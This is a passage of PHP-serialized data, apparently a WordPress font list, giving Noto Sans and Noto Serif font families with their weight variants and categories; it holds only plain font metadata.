Elymaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Georgian\";a:3:{s:5:\"label\";s:18:\"Noto Sans Georgian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Glagolitic\";a:3:{s:5:\"label\";s:20:\"Noto Sans Glagolitic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Gothic\";a:3:{s:5:\"label\";s:16:\"Noto Sans Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Grantha\";a:3:{s:5:\"label\";s:17:\"Noto Sans Grantha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Gujarati\";a:3:{s:5:\"label\";s:18:\"Noto Sans Gujarati\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:23:\"Noto Sans Gunjala Gondi\";a:3:{s:5:\"label\";s:23:\"Noto Sans Gunjala Gondi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Gurmukhi\";a:3:{s:5:\"label\";s:18:\"Noto Sans Gurmukhi\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans HK\";a:3:{s:5:\"label\";s:12:\"Noto Sans HK\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"Noto Sans Hanifi Rohingya\";a:3:{s:5:\"label\";s:25:\"Noto Sans Hanifi Rohingya\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Hanunoo\";a:3:{s:5:\"label\";s:17:\"Noto Sans Hanunoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Hatran\";a:3:{s:5:\"label\";s:16:\"Noto Sans Hatran\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Hebrew\";a:3:{s:5:\"label\";s:16:\"Noto Sans Hebrew\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:26:\"Noto Sans Imperial Aramaic\";a:3:{s:5:\"label\";s:26:\"Noto Sans Imperial Aramaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:29:\"Noto Sans Indic Siyaq Numbers\";a:3:{s:5:\"label\";s:29:\"Noto Sans Indic Siyaq Numbers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:31:\"Noto Sans Inscriptional Pahlavi\";a:3:{s:5:\"label\";s:31:\"Noto Sans Inscriptional Pahlavi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:32:\"Noto Sans Inscriptional Parthian\";a:3:{s:5:\"label\";s:32:\"Noto Sans Inscriptional Parthian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans JP\";a:3:{s:5:\"label\";s:12:\"Noto Sans JP\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Javanese\";a:3:{s:5:\"label\";s:18:\"Noto Sans Javanese\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans KR\";a:3:{s:5:\"label\";s:12:\"Noto Sans KR\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Kaithi\";a:3:{s:5:\"label\";s:16:\"Noto Sans Kaithi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Kannada\";a:3:{s:5:\"label\";s:17:\"Noto Sans Kannada\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Kayah Li\";a:3:{s:5:\"label\";s:18:\"Noto Sans Kayah Li\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Kharoshthi\";a:3:{s:5:\"label\";s:20:\"Noto Sans Kharoshthi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Khmer\";a:3:{s:5:\"label\";s:15:\"Noto Sans Khmer\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Khojki\";a:3:{s:5:\"label\";s:16:\"Noto Sans Khojki\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Khudawadi\";a:3:{s:5:\"label\";s:19:\"Noto Sans Khudawadi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Noto Sans Lao\";a:3:{s:5:\"label\";s:13:\"Noto Sans Lao\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Lepcha\";a:3:{s:5:\"label\";s:16:\"Noto Sans Lepcha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Limbu\";a:3:{s:5:\"label\";s:15:\"Noto Sans Limbu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Linear A\";a:3:{s:5:\"label\";s:18:\"Noto Sans Linear A\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Linear B\";a:3:{s:5:\"label\";s:18:\"Noto Sans Linear B\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Lisu\";a:3:{s:5:\"label\";s:14:\"Noto Sans Lisu\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Lycian\";a:3:{s:5:\"label\";s:16:\"Noto Sans Lycian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Lydian\";a:3:{s:5:\"label\";s:16:\"Noto Sans Lydian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Mahajani\";a:3:{s:5:\"label\";s:18:\"Noto Sans Mahajani\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Malayalam\";a:3:{s:5:\"label\";s:19:\"Noto Sans Malayalam\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Mandaic\";a:3:{s:5:\"label\";s:17:\"Noto Sans Mandaic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Manichaean\";a:3:{s:5:\"label\";s:20:\"Noto Sans Manichaean\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Marchen\";a:3:{s:5:\"label\";s:17:\"Noto Sans Marchen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:23:\"Noto Sans Masaram Gondi\";a:3:{s:5:\"label\";s:23:\"Noto Sans Masaram Gondi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Math\";a:3:{s:5:\"label\";s:14:\"Noto Sans Math\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:24:\"Noto Sans Mayan Numerals\";a:3:{s:5:\"label\";s:24:\"Noto Sans Mayan Numerals\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans Medefaidrin\";a:3:{s:5:\"label\";s:21:\"Noto Sans Medefaidrin\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:22:\"Noto Sans Meetei Mayek\";a:3:{s:5:\"label\";s:22:\"Noto Sans Meetei Mayek\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Meroitic\";a:3:{s:5:\"label\";s:18:\"Noto Sans Meroitic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Miao\";a:3:{s:5:\"label\";s:14:\"Noto Sans Miao\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Modi\";a:3:{s:5:\"label\";s:14:\"Noto Sans Modi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Mongolian\";a:3:{s:5:\"label\";s:19:\"Noto Sans Mongolian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Mono\";a:3:{s:5:\"label\";s:14:\"Noto Sans Mono\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:13:\"Noto Sans Mro\";a:3:{s:5:\"label\";s:13:\"Noto Sans Mro\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Multani\";a:3:{s:5:\"label\";s:17:\"Noto Sans Multani\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Myanmar\";a:3:{s:5:\"label\";s:17:\"Noto Sans Myanmar\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans N Ko\";a:3:{s:5:\"label\";s:14:\"Noto Sans N Ko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Nabataean\";a:3:{s:5:\"label\";s:19:\"Noto Sans Nabataean\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans New Tai Lue\";a:3:{s:5:\"label\";s:21:\"Noto Sans New Tai Lue\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Newa\";a:3:{s:5:\"label\";s:14:\"Noto Sans Newa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Nushu\";a:3:{s:5:\"label\";s:15:\"Noto Sans Nushu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Ogham\";a:3:{s:5:\"label\";s:15:\"Noto Sans Ogham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Ol Chiki\";a:3:{s:5:\"label\";s:18:\"Noto Sans Ol Chiki\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:23:\"Noto Sans Old Hungarian\";a:3:{s:5:\"label\";s:23:\"Noto Sans Old Hungarian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Old Italic\";a:3:{s:5:\"label\";s:20:\"Noto Sans Old Italic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:27:\"Noto Sans Old North Arabian\";a:3:{s:5:\"label\";s:27:\"Noto Sans Old North Arabian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Old Permic\";a:3:{s:5:\"label\";s:20:\"Noto Sans Old Permic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans Old Persian\";a:3:{s:5:\"label\";s:21:\"Noto Sans Old Persian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans Old Sogdian\";a:3:{s:5:\"label\";s:21:\"Noto Sans Old Sogdian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:27:\"Noto Sans Old South Arabian\";a:3:{s:5:\"label\";s:27:\"Noto Sans Old South Arabian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Old Turkic\";a:3:{s:5:\"label\";s:20:\"Noto Sans Old Turkic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Oriya\";a:3:{s:5:\"label\";s:15:\"Noto Sans Oriya\";s:8:\"variants\";a:4:{i:0;s:3:\"100\";i:1;s:3:\"700\";i:2;s:3:\"900\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Osage\";a:3:{s:5:\"label\";s:15:\"Noto Sans Osage\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Osmanya\";a:3:{s:5:\"label\";s:17:\"Noto Sans Osmanya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:22:\"Noto Sans Pahawh Hmong\";a:3:{s:5:\"label\";s:22:\"Noto Sans Pahawh Hmong\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Palmyrene\";a:3:{s:5:\"label\";s:19:\"Noto Sans Palmyrene\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans Pau Cin Hau\";a:3:{s:5:\"label\";s:21:\"Noto Sans Pau Cin Hau\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Phags Pa\";a:3:{s:5:\"label\";s:18:\"Noto Sans Phags Pa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Phoenician\";a:3:{s:5:\"label\";s:20:\"Noto Sans Phoenician\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"Noto Sans Psalter Pahlavi\";a:3:{s:5:\"label\";s:25:\"Noto Sans Psalter Pahlavi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Rejang\";a:3:{s:5:\"label\";s:16:\"Noto Sans Rejang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Runic\";a:3:{s:5:\"label\";s:15:\"Noto Sans Runic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans SC\";a:3:{s:5:\"label\";s:12:\"Noto Sans SC\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Samaritan\";a:3:{s:5:\"label\";s:19:\"Noto Sans Samaritan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Saurashtra\";a:3:{s:5:\"label\";s:20:\"Noto Sans Saurashtra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Sharada\";a:3:{s:5:\"label\";s:17:\"Noto Sans Sharada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Shavian\";a:3:{s:5:\"label\";s:17:\"Noto Sans Shavian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Siddham\";a:3:{s:5:\"label\";s:17:\"Noto Sans Siddham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Sinhala\";a:3:{s:5:\"label\";s:17:\"Noto Sans Sinhala\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Sogdian\";a:3:{s:5:\"label\";s:17:\"Noto Sans Sogdian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:22:\"Noto Sans Sora Sompeng\";a:3:{s:5:\"label\";s:22:\"Noto Sans Sora Sompeng\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Soyombo\";a:3:{s:5:\"label\";s:17:\"Noto Sans Soyombo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Sundanese\";a:3:{s:5:\"label\";s:19:\"Noto Sans Sundanese\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:22:\"Noto Sans Syloti Nagri\";a:3:{s:5:\"label\";s:22:\"Noto Sans Syloti Nagri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Symbols\";a:3:{s:5:\"label\";s:17:\"Noto Sans Symbols\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Symbols 2\";a:3:{s:5:\"label\";s:19:\"Noto Sans Symbols 2\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Syriac\";a:3:{s:5:\"label\";s:16:\"Noto Sans Syriac\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans TC\";a:3:{s:5:\"label\";s:12:\"Noto Sans TC\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Tagalog\";a:3:{s:5:\"label\";s:17:\"Noto Sans Tagalog\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Tagbanwa\";a:3:{s:5:\"label\";s:18:\"Noto Sans Tagbanwa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Tai Le\";a:3:{s:5:\"label\";s:16:\"Noto Sans Tai Le\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Tai Tham\";a:3:{s:5:\"label\";s:18:\"Noto Sans Tai Tham\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Tai Viet\";a:3:{s:5:\"label\";s:18:\"Noto Sans Tai Viet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Takri\";a:3:{s:5:\"label\";s:15:\"Noto Sans Takri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Tamil\";a:3:{s:5:\"label\";s:15:\"Noto Sans Tamil\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:26:\"Noto Sans Tamil Supplement\";a:3:{s:5:\"label\";s:26:\"Noto Sans Tamil Supplement\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Telugu\";a:3:{s:5:\"label\";s:16:\"Noto Sans Telugu\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Thaana\";a:3:{s:5:\"label\";s:16:\"Noto Sans Thaana\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Thai\";a:3:{s:5:\"label\";s:14:\"Noto Sans Thai\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans Thai Looped\";a:3:{s:5:\"label\";s:21:\"Noto Sans Thai Looped\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Tifinagh\";a:3:{s:5:\"label\";s:18:\"Noto Sans Tifinagh\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Tirhuta\";a:3:{s:5:\"label\";s:17:\"Noto Sans Tirhuta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Ugaritic\";a:3:{s:5:\"label\";s:18:\"Noto Sans Ugaritic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Noto Sans Vai\";a:3:{s:5:\"label\";s:13:\"Noto Sans Vai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Wancho\";a:3:{s:5:\"label\";s:16:\"Noto Sans Wancho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Noto Sans Warang Citi\";a:3:{s:5:\"label\";s:21:\"Noto Sans Warang Citi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Noto Sans Yi\";a:3:{s:5:\"label\";s:12:\"Noto Sans Yi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:26:\"Noto Sans Zanabazar Square\";a:3:{s:5:\"label\";s:26:\"Noto Sans Zanabazar Square\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Noto Serif\";a:3:{s:5:\"label\";s:10:\"Noto Serif\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Noto Serif Ahom\";a:3:{s:5:\"label\";s:15:\"Noto Serif Ahom\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Noto Serif Armenian\";a:3:{s:5:\"label\";s:19:\"Noto Serif 